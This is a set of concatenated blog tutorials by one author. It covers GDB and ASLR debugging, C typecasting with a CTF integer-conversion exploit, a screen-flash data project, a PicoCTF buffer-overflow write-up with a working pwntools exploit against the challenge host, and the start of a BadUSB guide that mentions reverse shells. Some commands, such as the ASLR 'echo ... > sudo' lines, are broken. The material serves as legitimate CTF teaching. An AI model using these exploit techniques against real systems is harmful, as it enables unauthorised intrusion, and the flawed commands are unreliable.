Prerequisites

Source Code

This is the source code that I will be debugging:

  1 #include <stdio.h>
  2 #include <string.h>
  3 #include <stdlib.h>
  4 
  5 void init() {
  6     setvbuf(stdout, 0, 2, 0);
  7     setvbuf(stdin, 0, 2, 0);
  8 }
  9 
 10 void win() {
 11     system("/bin/sh");
 12 }
 13 
 14 int main() {
 15     int isValid;
 16     char password[] = "password";
 17     char input[100]; 
 18     
 19     printf("Guess my password!\n");
 20     scanf("%99s", input);
 21 
 22     isValid = strcmp(input, password);  
 23     if (isValid == 0) { 
 24         printf("Access granted!\n");
 25         win();  
 26     } else {
 27         printf("Access denied.\n");
 28     }
 29 
 30     return 0;
 31 }

To strip this file you can either:

• Strip it while compiling: gcc simple-pwn.c -o simple-pwn.o -s

• Strip the output binary: strip simple-pwn.o

To check if the binary is stripped, you can use the file command:

[user@myarch]$ file simple-pwn.o
simple-pwn.o: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), 
dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, 
BuildID[sha1]=a06a70a06059d4f98e06171bc39ffb3a9ad667eb, 
for GNU/Linux 4.4.0, stripped

Turning off ASLR

ASLR (Address Space Layout Randomization) is a security feature that randomizes memory addresses to make it harder to exploit vulnerabilities. This can be frustrating in gdb when you try to access memory addresses that no longer exist. ASLR is enabled in gdb when the setuid bit (which allows the binary to execute with the privileges of its owner) is set to true. This is common with remote desktops that you connect to; however, it's not always necessary to disable ASLR.

a) Turning off ASLR on a particular file

To disable the setuid bit on a file, either:

1. Direct Permission Change:

    chmod u-s filename
   

2. copy it into /tmp:

    cp ./filename /tmp/filename
   

b) Turning ASLR off system wide (sudo permission)

The value of /proc/sys/kernel/randomize_va_space controls ASLR on your system. The command below will temporarily disable ASLR until the next restart.

echo 0 > sudo /proc/sys/kernel/randomize_va_space

The following options:

• 0: disabled

• 1: Conservative: Shared libraries and PIE binaries are randomized.

• 2: Conservative and start of brk area is randomized.

To turn ASLR back on:

echo 2 > sudo /proc/sys/kernel/randomize_va_space

c) Turning off ASLR while using pwntools with GDB

pwntools is a python module that greatly aids in reverse engineering and binary exploitation. However it does load ASLR automatically even if the setuid bit is false. Fortunately, there's a parameter that disables ASLR.

>>> from pwn import * 
>>> filename = '/tmp/simple-pwn.o' 
>>> gdb.debug(filename,aslr=False)

Adding the Base Address to GDB

When ASLR is turned off, the base address of any binary will be fixed at 0x0000555555554000. To set this as a variable in GDB, execute the following command:

(gdb) set $BASE = 0x0000555555554000

I highly recommend adding this line to your ~/.gdbinit file to ensure it's set every time you run gdb.

echo 'set $BASE = 0x0000555555554000' >> ~/.gdbinit

This will be used heavily in the next section.

Using offsets

You can break at specified points in the code of a binary if you know the offset to the instructions.

Finding Offsets

a) GDB

Using GDB's built-in functions, you can find the entry address offset before the binary has run:

(gdb) info file
Symbols from "/tmp/simple-pwn.o".
Local exec file:
    `/tmp/simple-pwn.o', file type elf64-x86-64.
    Entry point: 0x1090
    0x0000000000000318 - 0x0000000000000334 is .interp
    0x0000000000000338 - 0x0000000000000378 is .note.gnu.property
    0x0000000000000378 - 0x000000000000039c is .note.gnu.build-id
    0x000000000000039c - 0x00000000000003bc is .note.ABI-tag
    0x00000000000003c0 - 0x00000000000003e8 is .gnu.hash
    0x00000000000003e8 - 0x0000000000000538 is .dynsym
    0x0000000000000538 - 0x000000000000061c is .dynstr
    0x000000000000061c - 0x0000000000000638 is .gnu.version
    0x0000000000000638 - 0x0000000000000688 is .gnu.version_r
    0x0000000000000688 - 0x0000000000000778 is .rela.dyn
    0x0000000000000778 - 0x0000000000000808 is .rela.plt
    0x0000000000001000 - 0x000000000000101b is .init
    0x0000000000001020 - 0x0000000000001090 is .plt
    0x0000000000001090 - 0x0000000000001296 is .text
    0x0000000000001298 - 0x00000000000012a5 is .fini
    0x0000000000002000 - 0x0000000000002043 is .rodata
    0x0000000000002044 - 0x0000000000002078 is .eh_frame_hdr
    0x0000000000002078 - 0x0000000000002134 is .eh_frame
    0x0000000000003dd0 - 0x0000000000003dd8 is .init_array
    0x0000000000003dd8 - 0x0000000000003de0 is .fini_array
    0x0000000000003de0 - 0x0000000000003fc0 is .dynamic
    0x0000000000003fc0 - 0x0000000000003fe8 is .got
    0x0000000000003fe8 - 0x0000000000004030 is .got.plt
    0x0000000000004030 - 0x0000000000004040 is .data
    0x0000000000004040 - 0x0000000000004060 is .bss

From here you can find where the instructions are stored, by looking at the offset at 'Entry Point: 0x1090'. The instruction offset's of the binary can now be found:

(gdb) x/20i 0x1090
   0x1090:    endbr64
   0x1094:    xor    ebp,ebp
   0x1096:    mov    r9,rdx
   0x1099:    pop    rsi
   0x109a:    mov    rdx,rsp
   0x109d:    and    rsp,0xfffffffffffffff0
   0x10a1:    push   rax
   0x10a2:    push   rsp
   0x10a3:    xor    r8d,r8d
   0x10a6:    xor    ecx,ecx
   0x10a8:    lea    rdi,[rip+0x133]        # 0x11e2
   0x10af:        call   QWORD PTR [rip+0x2f0b]        # 0x3fc0
   0x10b5:    hlt
   0x10b6:    cs nop WORD PTR [rax+rax*1+0x0]
   0x10c0:    lea    rdi,[rip+0x2f79]        # 0x4040 <stdout>
   0x10c7:    lea    rax,[rip+0x2f72]        # 0x4040 <stdout>
   0x10ce:    cmp    rax,rdi
   0x10d1:    je     0x10e8
   0x10d3:    mov    rax,QWORD PTR [rip+0x2eee]        # 0x3fc8
   0x10da:    test   rax,rax

b) objdump

objdump is a command-line utility that displays the machine code of a binary in assembly language along with its offsets.

[user@myarch Articles]$ objdump -d -M intel -j .text simple-pwn.o

simple-pwn.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000001090 <.text>:
    1090:    f3 0f 1e fa              endbr64
    1094:    31 ed                    xor    ebp,ebp
    1096:    49 89 d1                 mov    r9,rdx
    1099:    5e                       pop    rsi
    109a:    48 89 e2                 mov    rdx,rsp
    109d:    48 83 e4 f0              and    rsp,0xfffffffffffffff0
    10a1:    50                       push   rax
    10a2:    54                       push   rsp
    10a3:    45 31 c0                 xor    r8d,r8d
    10a6:    31 c9                    xor    ecx,ecx
    10a8:    48 8d 3d 33 01 00 00     lea    rdi,[rip+0x133]       
    10af:    ff 15 0b 2f 00 00        call   QWORD PTR [rip+0x2f0b]        
    10b5:    f4                       hlt
    10b6:    66 2e 0f 1f 84 00 00     cs nop WORD PTR [rax+rax*1+0x0]
...

c) Getting offsets with a Decompiler (Ghidra)

All good decompilers provide a method to determine the offset of an instruction from the base of the binary. In Ghidra, you can easily get the offset of an assembly instruction by hovering over it.

The offset we need is the 'Imagebase Offset,' which is +1230h or 0x1230.

Using the offsets

Once the offset is found, it can be added to the $BASE variable to get its runtime memory address. For example, the runtime instruction address for 'call scanf' can be found by adding its offset (0x1230) to the base address.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./simple-pwn.o...
(No debugging symbols found in ./simple-pwn.o)
(gdb) p/x $BASE + 0x1230
$1 = 0x555555555230

The address 0x555555555230 is the runtime address for the 'call scanf' instruction. This address can then be used for a breakpoint.

(gdb) b *($BASE + 0x1230)
Breakpoint 1 at 0x555555555230
(gdb) r
Starting program: /tmp/simple-pwn.o 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Guess my password!

Breakpoint 1, 0x0000555555555230 in ?? ()
(gdb)

Addresses created by the offset and $BASE can be used for all other functions of gdb, such as call, watch, jump, etc.

Conclusion

Thanks for reading this article, I hope it is useful for you. If you have any questions you can dm me at @dingo418. If you have any other gdb tips that you think would be useful for people to know, let me know.

Credits:

Documentation for ASLR

Having some background knowledge in C, stack, and assembly will be super helpful, and eventually a must, as we tackle more advanced topics. I will be using Kali Linux as the main platform for this series, but most of what we'll learn can also be applied to Windows.

What is Typecasting?

Typecasting takes place when the compiler converts a value into a different data type. Such conversions can often be mishandled and may result in unexpected behaviour that you can abuse to control the program's control flow. In this article, our focus will primarily be on C, which offers the most attack vectors to explore.

Explicit Type Casting

Explicit type casting is when the programmer explicitly specifies the desired type conversion. For example:

double x = 10.5;  // x is a double
int y = (int)x;    // Explicitly convert the double x to an int

printf("%d\n", y);  // Output: 10

Here, x is a double, and it has been specifically changed into an int using (int)x. This explicit casting clearly tells the system to convert the double value into an int.

Implicit Type Casting

When doing arithmetic operations, the compiler can automatically change the types of data to be compatible with each other. This occurs automatically by the language's rules and type system. For example:

int x = 10;
double y = 5.2; 

double result = x + y;  // The integer x is implicitly promoted to a double
printf("%lf\n", result);  // Output: 15.200000

The integer x is implicitly promoted to a double so that the addition operation can be performed without data loss. But how does it know what operand to change?

Overview of the Data Types

Here's a quick overview of various data types, their sizes in bytes, and their respective value ranges:

Generic Arithmetic Conversions

The intricate specifics of how arithmetic conversions determine what to convert fall beyond the scope of this article. You won't need an understanding for this article. It is a very large topic, and some more detailed information can be found here. But In a nutshell, it adheres to a data type hierarchy and a set of straightforward rules. When the values are of the same type, the conversion process concludes.

1. Floating Points Take Precedence: If any operand is a floating-point number, convert all operands to the floating-point type with the highest precision. No further conversion is needed.

2. Apply Integer Promotions: When both operands are of integer types, integer promotions are carried out on both operands. This entails converting any integer type narrower than an int into an int, while leaving unchanged any type that matches the width of an int, is larger than an int, or is not an integer type.

3. Conversion Based on Integer Conversion Rank: If the operands have the same sign (both signed or both unsigned), convert the operand with the lower integer conversion rank to the type of the operand with the higher integer conversion rank. This step finishes the conversion.

• If the unsigned operand has a higher or equal integer conversion rank compared to the signed operand, convert the signed operand to the type of the unsigned operand.

• If the signed operand has a higher integer conversion rank than the unsigned operand and a value-preserving conversion is possible, convert the unsigned operand to the type of the signed operand, completing the conversion.

• If the signed operand has a higher integer conversion rank than the unsigned operand, but a value-preserving conversion is not possible, convert both operands to the unsigned type corresponding to the type of the signed operand. This is the final step in the conversion process.

If you don't know what a "signed" data type is, it will be further discussed below. But how does the compiler convert between different signs, sizes and ranges?

Conversion Type:

Although typecasting works most of the time, it's not perfect. To help learn how C deals with conversion. I wrote a program here%20TypeCasting) that will allow you to simply convert to and from different data types.

From:
[0] signed char
[1] unsigned char
[2] short int (or short)
[3] unsigned short int (or unsigned short)
[4] int
[5] unsigned int
[6] long int (or long)
[7] unsigned long int (or unsigned long)
[8] long long int (or long long)
[9] unsigned long long int (or unsigned long long)
[10] float
[11] double
[12] long double
Enter the first corresponding type index: 3
Enter the second corresponding type index: 2
Enter original Value: 65535
Original Unsigned Short Int Value: 65535
Converted to Short Int Value: -1

There are 3 different types of typecasting:

Narrowing

This occurs when a value is converted to a data type with a smaller range. For example, converting an int to an short int is a narrowing conversion. It may result in data loss if the int value is larger than the size of the value that the short int can hold.

Here is an example in C:

Enter the first corresponding type: int
Enter the second corresponding type: short int 
Enter original Value: 1011135
Original int Value: 1011135
Converted to short int Value: 28095

Breaking this down into binary:

Original Int (4 bytes): 010101010101111|0110110110111111 //1011135
Short Int    (2 Bytes):                |0110110110111111 //48576

As you can see, the operation simply disregards the larger bits.

Signed Conversion:

This occurs when a data type's sign convention is changed. For example, converting a negative int to an unsigned int will be converted incorrectly. But to understand how sign conversion works, let's first understand how the sign convention works.

Two's Complement representation

To understand signed conversion, let's begin by getting a handle on how a signed data type operates. C relies on what's known as Two's Complement representation. In this case, we'll illustrate it using just 4 bits, and it essentially boils down to two key aspects:

• The leftmost bit, also known as the most significant bit (MSB), serves as the sign bit. It tells us whether the number is positive (0) or negative (1).

• The rest of the bits follow the standard binary rules to represent the magnitude of the number.

Let's provide examples for both positive and negative numbers:

Example 1: Positive Number

Suppose we need to convert 6 into a 4-bit binary representation. 6 can be represented as (1 × 2²) + (1 × 2¹) + (0 × 2⁰) = (6)₁ or 110. As it is not negative, the MSB is 0 thus the 4-bit signed binary representation of 6 is 0110.

Example 2: Negative Number

Now, let's consider the value -6. We can start by converting 6 into binary, which gives us 0110. Next, we invert all the bits, resulting in 1001. Finally, we add 1 to this inverted value, yielding 1010. So, the final representation of -6 in Two's Complement is 1010.

Base 10:     -6
-----------------
6 in binary: 0110
Inverted:    1001
Add 1:       1010
-----------------
Final represntation:   1010

How Sign Conversion Works

How can we weaponize this in C? When performing sign conversions in C, it involves a direct translation with no bit swapping. As a result, the sign bit is also directly translated, potentially leading to an unexpected value.

Enter the first corresponding type index: unsigned short int
Enter the second corresponding type index: short int
Enter original Value: 65500 
Original Unsigned Short Int Value: 65500
Converted to Short Int Value: -36

Let's look at the conversion in binary:

unsigned short int (2 bytes): 1111111111011100 //65500
short int          (2 Bytes): 1111111111011100 //-36

The sign bit was directly translated to the short int, which is a signed data type. Which gives us a value of -36.

Widening Conversion (Promotion)

This process occurs when a value is converted to a data type with a larger range. When converting from a smaller type to a larger type and the original type is unsigned, it fills all extra bits with 0. If the original type is signed, it uses the sign's bit value and copies it into the extra bits of the new type.

NEGATIE CONVERSION
Enter the first corresponding type index: short int
Enter the second corresponding type index: int
Original Short Int Value: -5  //                  |1111111111111011
Converted to Int Value: -5    //  1111111111111111|1111111111111011

POSTIVE CONVERSION
Enter the first corresponding type: unsigned short int
Enter the second corresponding type: unsigned int
Original Short Int Value: 5  //                  |0000000000000101
Converted to Int Value: 5    //  0000000000000000|0000000000000101

There are no issues when widening the data type, provided the destination data type maintains the same sign convention (either signed or unsigned) as the source data type. Errors occur when there is a disparity in the sign representation between the source and destination data types.

Enter the first corresponding type index: short int
Enter the second corresponding type index: unsigned int 
Enter original Value: -9
Original Short Int Value: -9               //                 |1111111111110111
Converted to Unsigned Int Value: 4294967287// 1111111111111111|1111111111110111

Example: Downunderflow

Now, here's a CTF challenge that applies these principles. I suggest trying to work out the solution before peeking below.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define USERNAME_LEN 6
#define NUM_USERS 8
char logins[NUM_USERS][USERNAME_LEN] = { "user0", "user1", "user2", "user3", "user4", "user5", "user6", "admin" };

void init() {
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 2, 0);
}

int read_int_lower_than(int bound) {
    int x;
    scanf("%d", &x);
    if(x >= bound) {
        puts("Invalid input!");
        exit(1);
    }
    return x;
}

int main() {
    init();

    printf("Select user to log in as: ");
    unsigned short idx = read_int_lower_than(NUM_USERS - 1);
    printf("Logging in as %s\n", logins[idx]);
    if(strncmp(logins[idx], "admin", 5) == 0) {
        puts("Welcome admin.");
        system("/bin/sh");
    } else {
        system("/bin/date");
    }
}

The core program flow can be summarised as follows:

1. The program begins by defining an array of usernames (logins) and initialising it with 8 usernames, one of which is "admin."

2. It then prompts the user to input an index corresponding to the user they wish to access.

3. The program utilises the "read_int_lower_than()" function, which performs the following steps:

   a) Reads an integer input from the user.
   b) Checks if the input is greater than 7. If it is, an error message is displayed, and the program exits.
   c) It will return the index number.

4. If the selected index is "admin," the program spawns a shell.

Additionally, in the provided code, the "read_int_lower_than()" function returns an integer, which is then assigned to the variable "idx," with the type of an unsigned short int.

If we can somehow supply a number that will pass an int through the condition "less than 7" and when converted from an int to an unsigned short int gives us 7, we will be able to get the shell.

To achieve an unsigned integer value of 7 from a converted integer, we know:

• The first 16 bits of data are discarded during the conversion. This includes the MSB.

• The int value must be less than 7.

• The last 4 bits should equal 0111.

Since an int is signed, we can make it negative, fulfilling the condition that the int value must be less than 7. Now we need to construct a number that equals 7 when converted from an int to an unsigned short int. Let's make it in binary:
1000 0000 0000 0000 0000 0000 0000 0111

In this case, the second to the 16th bits can be junk, while the last 4 bits equal 0111. This results in the integer number of -2147483641, which fulfils both conditions.

.\a
Select user to log in as: -2147483641 
Logging in as admin
Welcome admin.

More Examples:

This website here is full of in-depth examples.

Conclusion

Thanks for reading this article. If you have any questions you can dm me. I will aim to try and get a new article out every 1-2 weeks, with the next article about buffer overflows.

Credits:

C Language Issues

C Language Issues for Application Security

The Basic Idea

The basic idea is getting a screen to flash certain colours in a certain combination and record it using a camera. Then I could get a python script to analyze the video and if the screen flashes red then the bit is 1 and if the screen is blue then the bit is 0 and if it is neither it is a separator which is shown as "|". I can then run this through a program that will reconstruct it to its original message. Simple in concept, but a bit more annoying to figure out.

The Code

Projecting the Message

This code converts text into binary data (8-bit binary letters) and displays it on a turtle graphics window in the form of flashes of red, blue, and green colours. Red represents 1, blue represents 0 and green the meant to be the separator between the two. Through the use of the parser, the user can change the message, the speed between the flashes of colour and the waiting period before and after the message. The binary representation of the message and the time taken to display it are also printed in the console.

import time
import turtle
from argparse import ArgumentParser

def splash(pause, wait, message):
    wn=turtle.Screen()
    wn.setup(width=1.0, height=1.0)
    data_in_binary = ""
    wn.bgcolor("green")
    time.sleep(wait)
    time1 = time.time()
    for letter in message:
        for bit in format(ord(letter), '#010b')[2:]: #8-bit binary letter
            if bit == "1":
                wn.bgcolor("red")
                data_in_binary += "1"
                time.sleep(pause)
            else:
                wn.bgcolor("blue")
                data_in_binary += "0"
                time.sleep(pause)
            end_time = time.time() 
            wn.bgcolor("green")
            time.sleep(pause)
    print(data_in_binary)
    print("time elapsed: ",end_time-time1)
    print("bits: ", len(message)*8)
    wn.bgcolor("green")
    time.sleep(wait)

def main():
    parser = ArgumentParser(description="Light Binary Project Screen")


    parser.add_argument("-m","--message", 
                        action="store", default="testing123,",
                        help="The message. The default is testing123"
                        )
    parser.add_argument("-s","--speed", 
                        action="store", default=0.2,
                        help="Pause between flashes of colour."
                        )
    parser.add_argument("-w","--wait", 
                        action="store", default=10,
                        help="Wait period before and after flashes."
                        )


    args = parser.parse_args()
    try:
        speed = float(args.speed)
        wait = float(args.wait)
    except:
        print("Please put a float for speed")
        exit() 

    splash(speed, wait, args.message)

if __name__ == "__main__":
    main()

Analyzing the video

This code analyzes video data, either from a webcam or from a video file, and extracts binary data from the light values of an individual pixel in the frame of the video picked by the user. The extracted binary data is then processed to remove repetitive bits, remove noise, and finally converted to text format which is printed to the console. The user can specify the video source and the sensitivity.

import cv2
from argparse import ArgumentParser

def click_function(event, x,y,flags,param):
    if event == cv2.EVENT_LBUTTONDBLCLK:
        global global_x, global_y, collection
        global_x = x
        global_y = y
        collection = True

def what_colour(r,g,b):
    if r > 245-sens and g < 10+sens and b < 10+sens:
        return "1"
    elif r < 10+sens and g < 10+sens and b > 245-sens:
        return "0"
    else:
        return "|"

def format(string):
    if string == "":
        return "NO INFO GIVEN"

    # Removing consecutive repeating bits
    format = "" 
    current_bit = string[0]
    current_count = 0
    for i in range(len(string)):
        if string[i] == current_bit:
            current_count += 1
        else:
            if current_count >= fuzzy:
                format += current_bit
            current_bit, current_count = string[i], 1
    if current_count >= fuzzy:
        format += current_bit

    # Removing "|"
    stripped = format.replace("|", "")

    # Adding space every 8 bits
    formatted_binary = ' '.join(stripped[i:i+8] for i in range(0, len(stripped), 8) )

    # Converting 8-bit binary to uefi
    text = "".join(chr(int(byte, 2)) for byte in formatted_binary.split())

    print("\n\n\n\n\n\n\n\n")
    print("Binary: ", formatted_binary)  
    print("Text: ", text)

def webcam(camera_id):
    raw = ""
    collection,raw = False, ""
    vid = cv2.VideoCapture(camera_id)
    print("Camera's up")

    while True: 
        _, frame = vid.read()        
        cv2.imshow("image", frame)
        cv2.setMouseCallback('image',click_function) 

        b,g,r = frame[global_y,global_x]

        if collection:
            bit = what_colour(r, g, b)
            print(bit,end="")
            raw += bit
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break

    vid.release()
    # Destroy all the windows
    cv2.destroyAllWindows()
    format(raw)

def analyze_file(file_location):
    raw = ""
    global collection
    collection = False
    #Get first frame
    video = cv2.VideoCapture(file_location)
    video.set(cv2.CAP_PROP_POS_FRAMES, 0)
    ret, img = video.read() 

    while True:
        cv2.imshow("image", img)
        cv2.setMouseCallback("image", click_function)
        if cv2.waitKey(1) & 0xFF == ord("q") or collection:
            break

    # close the windowy
    cv2.destroyAllWindows()

    video = cv2.VideoCapture(file_location)
    success, img = video.read()

    while success:
        b,g,r = img[global_y,global_x]        
        bit = what_colour(r, g, b)
        print(bit,end="")
        raw += bit
        # read next frame
        success, img = video.read()
    format(raw)

def main():
    parser = ArgumentParser(description="Light Binary for Reading light")

    parser.add_argument("-c","--camera", 
                        action="store", default=0, choices=("0","1","2","3"),
                        help="Different camera"
                        )
    parser.add_argument("-f","--file", 
                        action="store", default=None,
                        help="video file address file."
                        )
    parser.add_argument("-rgb", 
                        action="store", default=90,
                        help="RGB Senstivity"
                        )
    parser.add_argument("-sens", "-senstivity",
                        action="store", default=1,
                        help="senstivity gets rid of single bit pickups. If you got a good camera you can go to 0")
    args = parser.parse_args()

    try:
        global sens,fuzzy,raw
        sens = int(args.rgb)
        fuzzy = int(args.sens)
        raw = ""
    except:
        print("failed")
        exit()

    if args.file != None:
        analyze_file(args.file)
    else:
        webcam(int(args.camera))

if __name__ == "__main__":
    main()

Improvements

One improvement is splitting up the screen into multiple sections and having multiple streams concurrently showing. This could at least double the speed at which information is shown. This would add an extra level of complexity but with added speed, it is definitely worth the thought.

Another possible improvement is getting rid of the separator colour of green. This would be quite a complex task but it would at least speed up the process by 33%. This would also enable me to just use a flashing light or colour to communicate data. This would be a fun future project.

Final Notes

Overall this was a fun project. If you want to try out this project you can find it here on my GitHub. You will also find out some test videos on my GitHub. If you have any questions you can always leave a comment below or feel free to reach out to me on Twitter at @dingo418.

This is a write-up for PicoCTF 2022: Buffer Overflow 1. This is one of my favourite challenges to do. I recommend solving it for yourself before you read this write-up.

What is a Buffer Overflow?

Before we get started we need to first know what a buffer overflow is.

In a portion of your memory, you have a section called the stack. The Stack holds most of the temporary methods, local variables, and reference variables.

Inside the stack, there are 3 sections: the Buffer, Base Pointer, and Return address. Currently, we only need to worry about the Buffer and Return address. The Buffer is only a certain size, but what happens when we "smash the stack" and go over the Buffer? If there is no protection, we can overwrite the Base Pointer and more importantly the return address. This means we can point the return address to any method or piece of code we want. If you want to learn more, click here.

Credit: enscribe.dev

Conducting the Buffer Overflow

The very first thing we need to do is run checksec to find any Buffer Overflow protections.

┌──(kali㉿desktop)-[/media/…/Shared File/Pico CTF/2022/Buffer Overflow 1]
└─$ checksec ./vuln
[*] '/media/kali/Shared File/Pico CTF/2022/Buffer Overflow 1/vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

In this case, there are no protections.

Checking the code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"

#define BUFSIZE 32
#define FLAGSIZE 64

void win() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  printf(buf);
}

void vuln(){
  char buf[BUFSIZE];
  gets(buf);

  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  puts("Please enter your string: ");
  vuln();
  return 0;
}

If we look in the vuln() function we can see it uses the gets() function. If we can overwrite the return address with the win() 's function return address, we can make it execute the win()'s function and get the flag.

Finding the offset

The next thing we need to do is find the offset for the buffer. The hard way would be to keep on guessing the offset until it crashes, but there is an easier way to do it. We can use msfvenom's pattern creation tool. This creates a unique cyclic pattern bigger than the buffer size. When it crashes we read the return address. This return address will have a unique cyclic pattern that we can trace.

┌──(kali㉿desktop)-[/media/…/Shared File/Pico CTF/2022/Buffer Overflow 1]
└─$ msf-pattern_create -l 200                                                                                                                                                                                        
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

┌──(kali㉿desktop)-[/media/…/Shared File/Pico CTF/2022/Buffer Overflow 1]
└─$ echo "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag" | ./vuln
Please enter your string: 
Okay, time to return... Fingers Crossed... Jumping to 0x35624134
zsh: done                echo  | 
zsh: segmentation fault  ./vuln

┌──(kali㉿desktop)-[/media/…/Shared File/Pico CTF/2022/Buffer Overflow 1]
└─$ msf-pattern_offset  -q 0x35624134                                                                                                                                                                                       
[*] Exact match at offset 44

One important thing to note. This program uses Little Endian encoding. This means all the bytes for the memory address will be flipped as shown in the below image.

Credit: Little and Big Endian Mystery, geeksforgeeks

Manually finding the buffer size

Below is how to figure out the offset manually. It is important to know how to do it manually to fully understand it.

# Remember this is outputted in Little Endian so when need to re-arrange it
0x35624134 -->\xf6\x91\x04\x08

# Converting from hex to UEFI
\xf6\x91\x04\x08 --> 4Ab5

# Finding the offset
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab|4Ab5|

Checking the offset

To check that the offset is 44, we can run the following command:

┌──(kali㉿arch-desktop)-[/media/…/Shared File/Pico CTF/2022/Buffer Overflow 1]
└─$ python3 -c 'print("A"*44+"BBBB")' | ./vuln
Please enter your string: 
Okay, time to return... Fingers Crossed... Jumping to 0x42424242
zsh: done                python3 -c 'print("A"*44+"BBBB")' | 
zsh: segmentation fault  ./vuln

We know that we've found the offset as the return address is just the hex values for "B".

Finding the win() functions address

We can find the win functions address by using readelf -s vuln.

┌──(kali㉿arch-desktop)-[/media/…/Shared File/Pico CTF/2022/Buffer Overflow 1]
└─$ readelf -s vuln | grep "win" 

    63: 080491f6   139 FUNC    GLOBAL DEFAULT   13 win

Testing

Now that we know the offset and the address of the win() function's address, we can now craft an exploit. The easiest way to craft this exploit is with Python and the python pwntool module. We can not manually input strings into the console as there will be weird hex bytes that just don't work.

#!/usr/bin/env python3
from pwn import *

elf = ELF('./vuln', checksec=False)    

p = process(elf.path)

payload = b"A"*44 + p32(0x80491f6)  # p32() will translate the address into little endian

p = process(elf.path)
p.sendline(payload)
p.interactive()    # receives flag

This is the output we get when we run the code:

[x] Starting local process '/media/kali/Shared File/Pico CTF/2022/Buffer Overflow 1/vuln'
[+] Starting local process '/media/kali/Shared File/Pico CTF/2022/Buffer Overflow 1/vuln': pid 5212
[x] Starting local process '/media/kali/Shared File/Pico CTF/2022/Buffer Overflow 1/vuln'
[+] Starting local process '/media/kali/Shared File/Pico CTF/2022/Buffer Overflow 1/vuln': pid 5213
[*] Switching to interactive mode
[*] Process '/media/kali/Shared File/Pico CTF/2022/Buffer Overflow 1/vuln' stopped with exit code -11 (SIGSEGV) (pid 5213)
Please enter your string: 
Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
picoctf{colej.net}
[*] Got EOF while reading in interactive

As we can see, we get the dummy flag from our local machine.

Getting the flag

Now we need to figure out how to send data to picoCTF. This is when the magic of pwn-tools comes in handy. All you have to do is replace process(elf.path) with remote(host, port). This is the final exploit.

#!/usr/bin/env python3
from pwn import *

beRemote = True

elf = context.binary = ELF('./vuln', checksec=False) 
host, port = 'saturn.picoctf.net', [PORT]

p = process(elf.path)# references the elf object

payload = b"A"*44 + p32(0x80491f6)  # p32() will translate the address into little endian

if beRemote:    
    p = remote(host, port)
else:
    p = process(elf.path)

p.sendline(payload)
p.interactive()    # receives flag

This is the output we get when we run the code:

[x] Starting local process '/media/kali/Shared File/Pico CTF/2022/Buffer Overflow 1/vuln'
[+] Starting local process '/media/kali/Shared File/Pico CTF/2022/Buffer Overflow 1/vuln': pid 5490
[x] Opening connection to saturn.picoctf.net on port 63511
[x] Opening connection to saturn.picoctf.net on port 63511: Trying 18.217.86.78
[+] Opening connection to saturn.picoctf.net on port 63511: Done
[*] Switching to interactive mode
Please enter your string: 
Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
picoCTF{addr3ss3s_ar3_3asy_[REDACTED]}
[*] Got EOF while reading in interactive

As you can see here we got the flag!

Finishing notes

I hope you enjoyed this write-up for buffer-overflow 1 for picoCTF. If you have any questions you can always leave a comment below or feel free to reach out to me on Twitter at @dingo418.

Other good writeups

32-bit x86 LINUX BUFFER OVERFLOW (PicoCTF 2022 #31 'buffer-overflow1') by John Hamond

pico22/pwn: Buffer overflow series

A BadUSB is a USB device that acts as a keyboard and injects preprogrammed keystrokes into a computer. A BadUSB is Indistinguishable from a generic keyboard, making it near impossible to detect and patch. You can setup reverse shells, change the desktop background or change settings. The opportunities are limitless.

What do you need?

Depending on where you get a BadUSB from; you can expect a range of prices between $2 to $45.

The Hak5 USB Rubber Ducky costs around $45.

Where are ATMEGA32U4 cost around $30 from Amazon. If you get an ATTINY85 Arduino board you can expect around $2-10. This board is the one I recommend for beginners. You can get it anywhere from platforms like eBay, Alibaba or AliExpress. One thing to note about this board is that it has a 5-second delay before inputting keystrokes. This is due to it checking if it needs to be written to.

This tutorial is for an ATTINY85. This is due to its cheapness and availability. You will need the following:

1. Arduino ATTINY85
2. Arduino IDE
3. 20 minutes of free time

Tutorial

1. Install the Arduino IDE

Download and install the Arduino IDE.

2. Install the Digispark drivers

You are required to download Digispark drivers if your Arduino version is Arduino 1.6.6 or higher.

